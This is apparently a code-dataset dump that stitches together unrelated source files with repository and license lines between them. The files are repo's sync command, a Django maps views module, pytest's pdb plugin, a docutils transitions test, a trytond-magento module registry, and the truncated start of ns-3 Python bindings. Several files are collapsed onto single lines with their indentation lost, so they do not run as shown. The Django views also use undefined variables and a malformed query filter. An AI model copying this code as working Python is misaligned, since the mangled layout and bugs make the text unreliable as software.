# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from optparse import SUPPRESS_HELP
import os
import re
import shutil
import socket
import subprocess
import sys
import time
import xmlrpclib

# Fall back to the no-op dummy module on interpreters built without
# thread support; the fetch code below works either way.
try:
  import threading as _threading
except ImportError:
  import dummy_threading as _threading

from git_command import GIT
from git_refs import R_HEADS
from project import HEAD
from project import Project
from project import RemoteSpec
from command import Command, MirrorSafeCommand
from error import RepoChangedException, GitError
from project import R_HEADS
from project import SyncBuffer
from progress import Progress


class Sync(Command, MirrorSafeCommand):
  """'repo sync' subcommand: fetch from remotes, then update work trees."""

  # Number of projects fetched concurrently; overridden by -j/--jobs.
  jobs = 1
  common = True
  helpSummary = "Update working tree to the latest revision"
  helpUsage = """
%prog [<project>...]
"""
  helpDescription = """
The '%prog' command synchronizes local project directories with the
remote repositories specified in the manifest.  If a local project
does not yet exist, it will clone a new local directory from the
remote repository and set up tracking branches as specified in the
manifest.  If the local project already exists, '%prog' will update
the remote branches and rebase any new local changes on top of the
new remote changes.

'%prog' will synchronize all projects listed at the command line.
Projects can be specified either by name, or by a relative or
absolute path to the project's local directory. If no projects are
specified, '%prog' will synchronize all projects listed in the
manifest.

The -d/--detach option can be used to switch specified projects
back to the manifest revision.  This option is especially helpful
if the project is currently on a topic branch, but the manifest
revision is temporarily needed.

The -s/--smart-sync option can be used to sync to a known good
build as specified by the manifest-server element in the current
manifest.

The -f/--force-broken option can be used to proceed with syncing
other projects if a project sync fails.

SSH Connections
---------------

If at least one project remote URL uses an SSH connection (ssh://,
git+ssh://, or user@host:path syntax) repo will automatically
enable the SSH ControlMaster option when connecting to that host.
This feature permits other projects in the same '%prog' session to
reuse the same SSH tunnel, saving connection setup overheads.

To disable this behavior on UNIX platforms, set the GIT_SSH
environment variable to 'ssh'.  For example:

  export GIT_SSH=ssh
  %prog

Compatibility
~~~~~~~~~~~~~

This feature is automatically disabled on Windows, due to the lack
of UNIX domain socket support.

This feature is not compatible with url.insteadof rewrites in the
user's ~/.gitconfig.  '%prog' is currently not able to perform the
rewrite early enough to establish the ControlMaster tunnel.

If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or
later is required to fix a server side protocol bug.

"""

  def _Options(self, p, show_smart=True):
    """Register the command-line options for 'repo sync' on parser `p`."""
    p.add_option('-f', '--force-broken',
                 dest='force_broken', action='store_true',
                 help="continue sync even if a project fails to sync")
    p.add_option('-l','--local-only',
                 dest='local_only', action='store_true',
                 help="only update working tree, don't fetch")
    p.add_option('-n','--network-only',
                 dest='network_only', action='store_true',
                 help="fetch only, don't update working tree")
    p.add_option('-d','--detach',
                 dest='detach_head', action='store_true',
                 help='detach projects back to manifest revision')
    p.add_option('-q','--quiet',
                 dest='quiet', action='store_true',
                 help='be more quiet')
    p.add_option('-j','--jobs',
                 dest='jobs', action='store', type='int',
                 help="number of projects to fetch simultaneously")
    # `show_smart` lets callers (e.g. wrapper commands) hide the
    # manifest-server dependent option.
    if show_smart:
      p.add_option('-s', '--smart-sync',
                   dest='smart_sync', action='store_true',
                   help='smart sync using manifest from a known good build')

    g = p.add_option_group('repo Version options')
    g.add_option('--no-repo-verify',
                 dest='no_repo_verify', action='store_true',
                 help='do not verify repo source code')
    # Internal flag set when repo re-executes itself after upgrading.
    g.add_option('--repo-upgraded',
                 dest='repo_upgraded', action='store_true',
                 help=SUPPRESS_HELP)

  def _FetchHelper(self, opt, project, lock, fetched, pm, sem):
    """Worker body for one threaded network fetch.

    `lock` guards the shared `fetched` set and progress meter; `sem`
    bounds the number of concurrently running workers.
    """
    if not project.Sync_NetworkHalf(quiet=opt.quiet):
      print >>sys.stderr, 'error: Cannot fetch %s' % project.name
      if opt.force_broken:
        print >>sys.stderr, 'warn: --force-broken, continuing to sync'
      else:
        # Release the slot before bailing so other workers can proceed.
        # NOTE(review): sys.exit() in a thread only terminates this
        # worker, not the whole process -- confirm intended behavior.
        sem.release()
        sys.exit(1)

    lock.acquire()
    fetched.add(project.gitdir)
    pm.update()
    lock.release()
    sem.release()

  def _Fetch(self, projects, opt):
    """Fetch all `projects` from the network; return the set of fetched
    gitdirs.  Runs serially for jobs == 1, otherwise one thread per
    project bounded by a semaphore of `self.jobs` slots."""
    fetched = set()
    pm = Progress('Fetching projects', len(projects))

    if self.jobs == 1:
      for project in projects:
        pm.update()
        if project.Sync_NetworkHalf(quiet=opt.quiet):
          fetched.add(project.gitdir)
        else:
          print >>sys.stderr, 'error: Cannot fetch %s' % project.name
          if opt.force_broken:
            print >>sys.stderr, 'warn: --force-broken, continuing to sync'
          else:
            sys.exit(1)
    else:
      threads = set()
      lock = _threading.Lock()
      sem = _threading.Semaphore(self.jobs)
      for project in projects:
        # Block here until a worker slot frees up.
        sem.acquire()
        t = _threading.Thread(target = self._FetchHelper,
                              args = (opt, project, lock, fetched, pm, sem))
        threads.add(t)
        t.start()

      for t in threads:
        t.join()

    pm.end()
    # Opportunistic repack: let git decide whether a gc is worthwhile.
    for project in projects:
      project.bare_git.gc('--auto')
    return fetched

  def UpdateProjectList(self):
    """Rewrite .repo/project.list and delete work trees for projects
    that were dropped from the manifest.

    Returns 0 on success, -1 if an obsolete project has uncommitted
    changes (in which case nothing is deleted for that project).
    """
    new_project_paths = []
    for project in self.manifest.projects.values():
      if project.relpath:
        new_project_paths.append(project.relpath)
    file_name = 'project.list'
    file_path = os.path.join(self.manifest.repodir, file_name)
    old_project_paths = []

    if os.path.exists(file_path):
      fd = open(file_path, 'r')
      try:
        old_project_paths = fd.read().split('\n')
      finally:
        fd.close()
      for path in old_project_paths:
        if not path:
          continue
        if path not in new_project_paths:
          """If the path has already been deleted, we don't need to do it
          """
          if os.path.exists(self.manifest.topdir + '/' + path):
            # Build a throwaway Project just to inspect/remove the
            # on-disk work tree of the now-obsolete path.
            project = Project(
                           manifest = self.manifest,
                           name = path,
                           remote = RemoteSpec('origin'),
                           gitdir = os.path.join(self.manifest.topdir,
                                                 path, '.git'),
                           worktree = os.path.join(self.manifest.topdir, path),
                           relpath = path,
                           revisionExpr = 'HEAD',
                           revisionId = None)
            if project.IsDirty():
              # Refuse to destroy local work; caller aborts the sync.
              print >>sys.stderr, 'error: Cannot remove project "%s": \
uncommitted changes are present' % project.relpath
              print >>sys.stderr, '       commit changes, then run sync again'
              return -1
            else:
              print >>sys.stderr, 'Deleting obsolete path %s' % project.worktree
              shutil.rmtree(project.worktree)
              # Try deleting parent subdirs if they are empty
              dir = os.path.dirname(project.worktree)
              while dir != self.manifest.topdir:
                try:
                  os.rmdir(dir)
                except OSError:
                  # Directory not empty (or not removable): stop climbing.
                  break
                dir = os.path.dirname(dir)

    new_project_paths.sort()
    fd = open(file_path, 'w')
    try:
      fd.write('\n'.join(new_project_paths))
      fd.write('\n')
    finally:
      fd.close()
    return 0

  def Execute(self, opt, args):
    """Entry point for 'repo sync': validate options, optionally
    smart-sync the manifest, fetch over the network, then update the
    local work trees."""
    if opt.jobs:
      self.jobs = opt.jobs
    # -n (network only) conflicts with both -d and -l.
    if opt.network_only and opt.detach_head:
      print >>sys.stderr, 'error: cannot combine -n and -d'
      sys.exit(1)
    if opt.network_only and opt.local_only:
      print >>sys.stderr, 'error: cannot combine -n and -l'
      sys.exit(1)

    if opt.smart_sync:
      # Ask the manifest server (XML-RPC) for a known-good manifest
      # for the current branch, and override the local manifest with it.
      if not self.manifest.manifest_server:
        print >>sys.stderr, \
            'error: cannot smart sync: no manifest server defined in manifest'
        sys.exit(1)
      try:
        server = xmlrpclib.Server(self.manifest.manifest_server)
        p = self.manifest.manifestProject
        b = p.GetBranch(p.CurrentBranch)
        branch = b.merge
        if branch.startswith(R_HEADS):
          branch = branch[len(R_HEADS):]

        env = os.environ.copy()
        # Android build environment variables select a specific target
        # build when present.
        if (env.has_key('TARGET_PRODUCT') and
            env.has_key('TARGET_BUILD_VARIANT')):
          target = '%s-%s' % (env['TARGET_PRODUCT'],
                              env['TARGET_BUILD_VARIANT'])
          [success, manifest_str] = server.GetApprovedManifest(branch, target)
        else:
          [success, manifest_str] = server.GetApprovedManifest(branch)

        if success:
          manifest_name = "smart_sync_override.xml"
          manifest_path = os.path.join(self.manifest.manifestProject.worktree,
                                       manifest_name)
          try:
            f = open(manifest_path, 'w')
            try:
              f.write(manifest_str)
            finally:
              f.close()
          except IOError:
            print >>sys.stderr, 'error: cannot write manifest to %s' % \
                manifest_path
            sys.exit(1)
          self.manifest.Override(manifest_name)
        else:
          print >>sys.stderr, 'error: %s' % manifest_str
          sys.exit(1)
      except socket.error:
        print >>sys.stderr, 'error: cannot connect to manifest server %s' % (
            self.manifest.manifest_server)
        sys.exit(1)

    rp = self.manifest.repoProject
    rp.PreSync()

    mp = self.manifest.manifestProject
    mp.PreSync()

    if opt.repo_upgraded:
      _PostRepoUpgrade(self.manifest)

    if not opt.local_only:
      mp.Sync_NetworkHalf(quiet=opt.quiet)

    # If the manifest project itself changed, apply it and re-read the
    # manifest before resolving the project list.
    if mp.HasChanges:
      syncbuf = SyncBuffer(mp.config)
      mp.Sync_LocalHalf(syncbuf)
      if not syncbuf.Finish():
        sys.exit(1)
      self.manifest._Unload()
    all = self.GetProjects(args, missing_ok=True)

    if not opt.local_only:
      to_fetch = []
      now = time.time()
      # Refresh the repo project itself at most once a day.
      if (24 * 60 * 60) <= (now - rp.LastFetch):
        to_fetch.append(rp)
      to_fetch.extend(all)

      fetched = self._Fetch(to_fetch, opt)
      _PostRepoFetch(rp, opt.no_repo_verify)
      if opt.network_only:
        # bail out now; the rest touches the working tree
        return

      if mp.HasChanges:
        # The freshly fetched manifest changed again: apply it, reload,
        # and fetch any projects the new manifest added.
        syncbuf = SyncBuffer(mp.config)
        mp.Sync_LocalHalf(syncbuf)
        if not syncbuf.Finish():
          sys.exit(1)
        _ReloadManifest(self)
        mp = self.manifest.manifestProject

        all = self.GetProjects(args, missing_ok=True)
        missing = []
        for project in all:
          if project.gitdir not in fetched:
            missing.append(project)
        self._Fetch(missing, opt)

    if self.manifest.IsMirror:
      # bail out now, we have no working tree
      return

    if self.UpdateProjectList():
      sys.exit(1)

    syncbuf = SyncBuffer(mp.config,
                         detach_head = opt.detach_head)
    pm = Progress('Syncing work tree', len(all))
    for project in all:
      pm.update()
      if project.worktree:
        project.Sync_LocalHalf(syncbuf)
    pm.end()
    print >>sys.stderr
    if not syncbuf.Finish():
      sys.exit(1)


def _ReloadManifest(cmd):
  """Re-parse the manifest; upgrade in place if its format changed."""
  old = cmd.manifest
  new = cmd.GetManifest(reparse=True)

  if old.__class__ != new.__class__:
    print >>sys.stderr, 'NOTICE: manifest format has changed ***'
    new.Upgrade_Local(old)
  else:
    if new.notice:
      print new.notice


def _PostRepoUpgrade(manifest):
  """Run per-project post-upgrade hooks after repo itself was upgraded."""
  for project in manifest.projects.values():
    if project.Exists:
      project.PostRepoUpgrade()


def _PostRepoFetch(rp, no_repo_verify=False, verbose=False):
  """After fetching the repo project: if a new version arrived and it is
  verified (or verification is disabled), install it and restart repo by
  raising RepoChangedException."""
  if rp.HasChanges:
    print >>sys.stderr, 'info: A new version of repo is available'
    print >>sys.stderr, ''
    if no_repo_verify or _VerifyTag(rp):
      syncbuf = SyncBuffer(rp.config)
      rp.Sync_LocalHalf(syncbuf)
      if not syncbuf.Finish():
        sys.exit(1)
      print >>sys.stderr, 'info: Restarting repo with latest version'
      # Caught by the repo main loop, which re-executes with this flag.
      raise RepoChangedException(['--repo-upgraded'])
    else:
      print >>sys.stderr, 'warning: Skipped upgrade to unverified version'
  else:
    if verbose:
      print >>sys.stderr, 'repo version %s is current' % rp.work_git.describe(HEAD)


def _VerifyTag(project):
  """Return True if the project's current revision carries a GPG-signed
  release tag that verifies against ~/.repoconfig/gnupg."""
  gpg_dir = os.path.expanduser('~/.repoconfig/gnupg')
  if not os.path.exists(gpg_dir):
    # No keyring was set up at 'repo init' time; trust by default.
    print >>sys.stderr,\
"""warning: GnuPG was not available during last "repo init"
warning: Cannot automatically authenticate repo."""
    return True

  try:
    cur = project.bare_git.describe(project.GetRevisionId())
  except GitError:
    cur = None

  # A describe output like 'v1.0-3-gdeadbee' means we are *past* the tag,
  # i.e. the revision itself is not the signed tag.
  if not cur \
     or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur):
    rev = project.revisionExpr
    if rev.startswith(R_HEADS):
      rev = rev[len(R_HEADS):]

    print >>sys.stderr
    print >>sys.stderr,\
      "warning: project '%s' branch '%s' is not signed" \
      % (project.name, rev)
    return False

  env = os.environ.copy()
  env['GIT_DIR'] = project.gitdir.encode()
  env['GNUPGHOME'] = gpg_dir.encode()

  cmd = [GIT, 'tag', '-v', cur]
  proc = subprocess.Popen(cmd,
                          stdout = subprocess.PIPE,
                          stderr = subprocess.PIPE,
                          env = env)
  out = proc.stdout.read()
  proc.stdout.close()

  err = proc.stderr.read()
  proc.stderr.close()

  if proc.wait() != 0:
    # Verification failed; surface git's own output to the user.
    print >>sys.stderr
    print >>sys.stderr, out
    print >>sys.stderr, err
    print >>sys.stderr
    return False
  return True
apache-2.0
clayshieh/cal_hacks_2015
maps/views.py
1
2868
from django.shortcuts import render from django.core.urlresolvers import reverse from django.http import HttpResponse, HttpResponseRedirect # from userauth.forms import UserForm, UserProfileForm, ForgotForm from maps.models import Report, Route from django.contrib.auth import authenticate, login, logout from django.contrib.auth.decorators import login_required from django.contrib.auth.models import User # Create your views here. def test(request): return HttpResponse('test') def index(request): if request.POST: info = request.POST.get('scoreArray') alat = info[0] alng = info[1] blat = info[2] blng = info[3] qual = request.POST.get('quality') try: rpt = Report() rpt.quality = qual rpt.desc = "" rpt.lat = float(lat) rpt.lng = float(lng) rpt.save() except: return HttpResponse('something went wrong') else: try: route = Route.objects.filter(a_lat=alat).filter(a_lng=alng).filter(b_lat=blat).filter(blng) except: pass return render(request, 'index.html', {}) def slow(request): return render(request, 'index_slow.html', {}) def get_slow(request): if request.POST: alat = request.POST.get("lat1") alng = request.POST.get("lng1") blat = request.POST.get("lat2") blng = request.POST.get("lng2") print alat, alng, blat, blng try: print Route.objects.all() route = Route.objects.filter(a_lat=float(alat)).filter(a_lng=float(alng)).filter(b_lat=float(blat)).filter(b_lng=float(blng)) return HttpResponse(route[0].avg) except Exception as e: return HttpResponse(-1) else: print "2" return HttpResponse(-1) def report(request): if request.POST: a = request.POST.getlist("a[]") b = request.POST.getlist("b[]") alat = a[0] alng = a[1] blat = b[0] blng = b[1] qual = request.POST.get('rating') try: route = Route.objects.filter(a_lat=float(alat)).filter(a_lng=float(alng)).filter(b_lat=float(blat)).filter(b_lng=float(blng)) if len(route) == 0: route = Route() route.a_lat = alat route.a_lng = alng route.b_lat = blat route.b_lng = blng route.avg = qual route.save() return HttpResponse("created") else: 
route = route[0] if route != None or route != "null": route.avg -= route.avg / 10 route.avg += float(qual) / 10 route.save() return HttpResponse("updated route") except: return HttpResponse(-1) def get(request): if request.POST: result = [] array = request.POST.getlist("dict[]") x = 0 while x < len(array): alat = array[x] alng = array[x+1] blat = array[x+2] blng = array[x+3] x+=4 route = Route.objects.filter(a_lat=float(alat)).filter(a_lng=float(alng)).filter(b_lat=float(blat)).filter(b_lng=float(blng)) if len(route)==0: result.append(-1) else: result.append(route[0].avg) return HttpResponse(str(result)) else: return HttpResponse(-1)
gpl-2.0
zploskey/servo
tests/wpt/css-tests/tools/pytest/_pytest/pdb.py
176
3491
""" interactive debugging with PDB, the Python Debugger. """ from __future__ import absolute_import import pdb import sys import pytest def pytest_addoption(parser): group = parser.getgroup("general") group._addoption('--pdb', action="store_true", dest="usepdb", default=False, help="start the interactive Python debugger on errors.") def pytest_namespace(): return {'set_trace': pytestPDB().set_trace} def pytest_configure(config): if config.getvalue("usepdb"): config.pluginmanager.register(PdbInvoke(), 'pdbinvoke') old = (pdb.set_trace, pytestPDB._pluginmanager) def fin(): pdb.set_trace, pytestPDB._pluginmanager = old pytestPDB._config = None pdb.set_trace = pytest.set_trace pytestPDB._pluginmanager = config.pluginmanager pytestPDB._config = config config._cleanup.append(fin) class pytestPDB: """ Pseudo PDB that defers to the real pdb. """ _pluginmanager = None _config = None def set_trace(self): """ invoke PDB set_trace debugging, dropping any IO capturing. """ import _pytest.config frame = sys._getframe().f_back if self._pluginmanager is not None: capman = self._pluginmanager.getplugin("capturemanager") if capman: capman.suspendcapture(in_=True) tw = _pytest.config.create_terminal_writer(self._config) tw.line() tw.sep(">", "PDB set_trace (IO-capturing turned off)") self._pluginmanager.hook.pytest_enter_pdb(config=self._config) pdb.Pdb().set_trace(frame) class PdbInvoke: def pytest_exception_interact(self, node, call, report): capman = node.config.pluginmanager.getplugin("capturemanager") if capman: out, err = capman.suspendcapture(in_=True) sys.stdout.write(out) sys.stdout.write(err) _enter_pdb(node, call.excinfo, report) def pytest_internalerror(self, excrepr, excinfo): for line in str(excrepr).split("\n"): sys.stderr.write("INTERNALERROR> %s\n" %line) sys.stderr.flush() tb = _postmortem_traceback(excinfo) post_mortem(tb) def _enter_pdb(node, excinfo, rep): # XXX we re-use the TerminalReporter's terminalwriter # because this seems to avoid some encoding related 
troubles # for not completely clear reasons. tw = node.config.pluginmanager.getplugin("terminalreporter")._tw tw.line() tw.sep(">", "traceback") rep.toterminal(tw) tw.sep(">", "entering PDB") tb = _postmortem_traceback(excinfo) post_mortem(tb) rep._pdbshown = True return rep def _postmortem_traceback(excinfo): # A doctest.UnexpectedException is not useful for post_mortem. # Use the underlying exception instead: from doctest import UnexpectedException if isinstance(excinfo.value, UnexpectedException): return excinfo.value.exc_info[2] else: return excinfo._excinfo[2] def _find_last_non_hidden_frame(stack): i = max(0, len(stack) - 1) while i and stack[i][0].f_locals.get("__tracebackhide__", False): i -= 1 return i def post_mortem(t): class Pdb(pdb.Pdb): def get_stack(self, f, t): stack, i = pdb.Pdb.get_stack(self, f, t) if f is None: i = _find_last_non_hidden_frame(stack) return stack, i p = Pdb() p.reset() p.interaction(None, t)
mpl-2.0
SnappleCap/oh-mainline
vendor/packages/docutils/test/test_parsers/test_rst/test_transitions.py
19
5276
#! /usr/bin/env python

# $Id: test_transitions.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.

"""
Tests for transition markers.
"""

from __init__ import DocutilsTestSupport


def suite():
    # Each (input, expected-pseudo-XML) pair in `totest` becomes one
    # parser test case.
    s = DocutilsTestSupport.ParserTestSuite()
    s.generateTests(totest)
    return s

totest = {}

# See DocutilsTestSupport.ParserTestSuite.generateTests for a
# description of the 'totest' data structure.
# NOTE(review): the exact line wrapping inside these literals was lost in
# transit and has been reconstructed; verify against upstream docutils.
totest['transitions'] = [
["""\
Test transition markers.

--------

Paragraph
""",
"""\
<document source="test data">
    <paragraph>
        Test transition markers.
    <transition>
    <paragraph>
        Paragraph
"""],
["""\
Section 1
=========

First text division of section 1.

--------

Second text division of section 1.

Section 2
---------

Paragraph 2 in section 2.
""",
"""\
<document source="test data">
    <section ids="section-1" names="section\ 1">
        <title>
            Section 1
        <paragraph>
            First text division of section 1.
        <transition>
        <paragraph>
            Second text division of section 1.
        <section ids="section-2" names="section\ 2">
            <title>
                Section 2
            <paragraph>
                Paragraph 2 in section 2.
"""],
["""\
--------

A section or document may not begin with a transition.

The DTD specifies that two transitions may not be adjacent:

--------

--------

--------

The DTD also specifies that a section or document may not end with
a transition.

--------
""",
"""\
<document source="test data">
    <transition>
    <paragraph>
        A section or document may not begin with a transition.
    <paragraph>
        The DTD specifies that two transitions may not be adjacent:
    <transition>
    <transition>
    <transition>
    <paragraph>
        The DTD also specifies that a section or document may not end with
        a transition.
    <transition>
"""],
["""\
Test unexpected transition markers.

    Block quote.

    --------

    Paragraph.
""",
"""\
<document source="test data">
    <paragraph>
        Test unexpected transition markers.
    <block_quote>
        <paragraph>
            Block quote.
        <system_message level="4" line="5" source="test data" type="SEVERE">
            <paragraph>
                Unexpected section title or transition.
            <literal_block xml:space="preserve">
                --------
        <paragraph>
            Paragraph.
"""],
["""\
Short transition marker.

---

Paragraph
""",
"""\
<document source="test data">
    <paragraph>
        Short transition marker.
    <paragraph>
        ---
    <paragraph>
        Paragraph
"""],
["""\
Sections with transitions at beginning and end.

Section 1
=========

----------

The next transition is legal:

----------

Section 2
=========

----------
""",
"""\
<document source="test data">
    <paragraph>
        Sections with transitions at beginning and end.
    <section ids="section-1" names="section\ 1">
        <title>
            Section 1
        <transition>
        <paragraph>
            The next transition is legal:
        <transition>
    <section ids="section-2" names="section\ 2">
        <title>
            Section 2
        <transition>
"""],
["""\
A paragraph, two transitions, and a blank line.

----------

----------

""",
"""\
<document source="test data">
    <paragraph>
        A paragraph, two transitions, and a blank line.
    <transition>
    <transition>
"""],
["""\
A paragraph and two transitions.

----------

----------
""",  # the same:
"""\
<document source="test data">
    <paragraph>
        A paragraph and two transitions.
    <transition>
    <transition>
"""],
["""\
----------

Document beginning with a transition.
""",
"""\
<document source="test data">
    <transition>
    <paragraph>
        Document beginning with a transition.
"""],
["""\
Section 1
=========

Subsection 1
------------

Some text.

----------

Section 2
=========

Some text.
""",
"""\
<document source="test data">
    <section ids="section-1" names="section\ 1">
        <title>
            Section 1
        <section ids="subsection-1" names="subsection\ 1">
            <title>
                Subsection 1
            <paragraph>
                Some text.
            <transition>
    <section ids="section-2" names="section\ 2">
        <title>
            Section 2
        <paragraph>
            Some text.
"""],
["""\
Section 1
=========

----------

----------

----------

Section 2
=========

Some text.
""",
"""\
<document source="test data">
    <section ids="section-1" names="section\ 1">
        <title>
            Section 1
        <transition>
        <transition>
        <transition>
    <section ids="section-2" names="section\ 2">
        <title>
            Section 2
        <paragraph>
            Some text.
"""],
["""\
----------

----------

----------
""",
"""\
<document source="test data">
    <transition>
    <transition>
    <transition>
"""],
["""\
A paragraph.

----------

""",
"""\
<document source="test data">
    <paragraph>
        A paragraph.
    <transition>
"""],
]


if __name__ == '__main__':
    import unittest
    unittest.main(defaultTest='suite')
agpl-3.0
tarunbhardwaj/trytond-magento
__init__.py
3
1806
# -*- coding: utf-8 -*- from trytond.pool import Pool from wizard import ( TestMagentoConnectionStart, ImportWebsitesStart, ExportMagentoShipmentStatusStart, ExportMagentoShipmentStatus, ConfigureMagento, ImportStoresStart, FailureStart, UpdateMagentoCatalogStart, UpdateMagentoCatalog, SuccessStart, ExportDataWizardConfigure, ExportDataWizard, ) from channel import Channel, MagentoTier from party import Party, MagentoWebsiteParty, Address from product import ( Category, MagentoInstanceCategory, Product, ProductPriceTier, ProductSaleChannelListing ) from country import Country, Subdivision from currency import Currency from carrier import SaleChannelCarrier from sale import ( Sale, StockShipmentOut, SaleLine ) from bom import BOM from payment import MagentoPaymentGateway, Payment def register(): """ Register classes """ Pool.register( Channel, MagentoTier, TestMagentoConnectionStart, ImportStoresStart, FailureStart, SuccessStart, ImportWebsitesStart, UpdateMagentoCatalogStart, ExportMagentoShipmentStatusStart, Country, Subdivision, Party, MagentoWebsiteParty, Category, MagentoInstanceCategory, Product, ProductPriceTier, ExportDataWizardConfigure, StockShipmentOut, Address, Currency, Sale, SaleChannelCarrier, SaleLine, BOM, ProductSaleChannelListing, MagentoPaymentGateway, Payment, module='magento', type_='model' ) Pool.register( ExportMagentoShipmentStatus, ExportDataWizard, ConfigureMagento, UpdateMagentoCatalog, module='magento', type_='wizard' )
bsd-3-clause
xinhunbie/NS3-
src/buildings/bindings/modulegen__gcc_ILP32.py
38
318633
from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers import pybindgen.settings import warnings class ErrorHandler(pybindgen.settings.ErrorHandler): def handle_error(self, wrapper, exception, traceback_): warnings.warn("exception %r in wrapper %s" % (exception, wrapper)) return True pybindgen.settings.error_handler = ErrorHandler() import sys def module_init(): root_module = Module('ns.buildings', cpp_namespace='::ns3') return root_module def register_types(module): root_module = module.get_root() ## propagation-environment.h (module 'propagation'): ns3::CitySize [enumeration] module.add_enum('CitySize', ['SmallCity', 'MediumCity', 'LargeCity'], import_from_module='ns.propagation') ## propagation-environment.h (module 'propagation'): ns3::EnvironmentType [enumeration] module.add_enum('EnvironmentType', ['UrbanEnvironment', 'SubUrbanEnvironment', 'OpenAreasEnvironment'], import_from_module='ns.propagation') ## address.h (module 'network'): ns3::Address [class] module.add_class('Address', import_from_module='ns.network') ## address.h (module 'network'): ns3::Address::MaxSize_e [enumeration] module.add_enum('MaxSize_e', ['MAX_SIZE'], outer_class=root_module['ns3::Address'], import_from_module='ns.network') ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList [class] module.add_class('AttributeConstructionList', import_from_module='ns.core') ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item [struct] module.add_class('Item', import_from_module='ns.core', outer_class=root_module['ns3::AttributeConstructionList']) ## box.h (module 'mobility'): ns3::Box [class] module.add_class('Box', import_from_module='ns.mobility') ## box.h (module 'mobility'): ns3::Box::Side [enumeration] module.add_enum('Side', ['RIGHT', 'LEFT', 'TOP', 'BOTTOM', 'UP', 'DOWN'], outer_class=root_module['ns3::Box'], import_from_module='ns.mobility') ## building-container.h (module 'buildings'): 
ns3::BuildingContainer [class] module.add_class('BuildingContainer') ## building-list.h (module 'buildings'): ns3::BuildingList [class] module.add_class('BuildingList') ## buildings-helper.h (module 'buildings'): ns3::BuildingsHelper [class] module.add_class('BuildingsHelper') ## callback.h (module 'core'): ns3::CallbackBase [class] module.add_class('CallbackBase', import_from_module='ns.core') ## constant-velocity-helper.h (module 'mobility'): ns3::ConstantVelocityHelper [class] module.add_class('ConstantVelocityHelper', import_from_module='ns.mobility') ## hash.h (module 'core'): ns3::Hasher [class] module.add_class('Hasher', import_from_module='ns.core') ## ipv4-address.h (module 'network'): ns3::Ipv4Address [class] module.add_class('Ipv4Address', import_from_module='ns.network') ## ipv4-address.h (module 'network'): ns3::Ipv4Address [class] root_module['ns3::Ipv4Address'].implicitly_converts_to(root_module['ns3::Address']) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask [class] module.add_class('Ipv4Mask', import_from_module='ns.network') ## ipv6-address.h (module 'network'): ns3::Ipv6Address [class] module.add_class('Ipv6Address', import_from_module='ns.network') ## ipv6-address.h (module 'network'): ns3::Ipv6Address [class] root_module['ns3::Ipv6Address'].implicitly_converts_to(root_module['ns3::Address']) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix [class] module.add_class('Ipv6Prefix', import_from_module='ns.network') ## node-container.h (module 'network'): ns3::NodeContainer [class] module.add_class('NodeContainer', import_from_module='ns.network') ## object-base.h (module 'core'): ns3::ObjectBase [class] module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core') ## object.h (module 'core'): ns3::ObjectDeleter [struct] module.add_class('ObjectDeleter', import_from_module='ns.core') ## object-factory.h (module 'core'): ns3::ObjectFactory [class] module.add_class('ObjectFactory', import_from_module='ns.core') ## 
simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Object', 'ns3::ObjectBase', 'ns3::ObjectDeleter'], parent=root_module['ns3::ObjectBase'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## tag-buffer.h (module 'network'): ns3::TagBuffer [class] module.add_class('TagBuffer', import_from_module='ns.network') ## nstime.h (module 'core'): ns3::TimeWithUnit [class] module.add_class('TimeWithUnit', import_from_module='ns.core') ## type-id.h (module 'core'): ns3::TypeId [class] module.add_class('TypeId', import_from_module='ns.core') ## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration] module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core') ## type-id.h (module 'core'): ns3::TypeId::SupportLevel [enumeration] module.add_enum('SupportLevel', ['SUPPORTED', 'DEPRECATED', 'OBSOLETE'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core') ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct] module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId']) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct] module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId']) ## vector.h (module 'core'): ns3::Vector2D [class] module.add_class('Vector2D', import_from_module='ns.core') ## vector.h (module 'core'): ns3::Vector3D [class] module.add_class('Vector3D', import_from_module='ns.core') ## empty.h (module 'core'): ns3::empty [class] module.add_class('empty', import_from_module='ns.core') ## int64x64-double.h (module 'core'): 
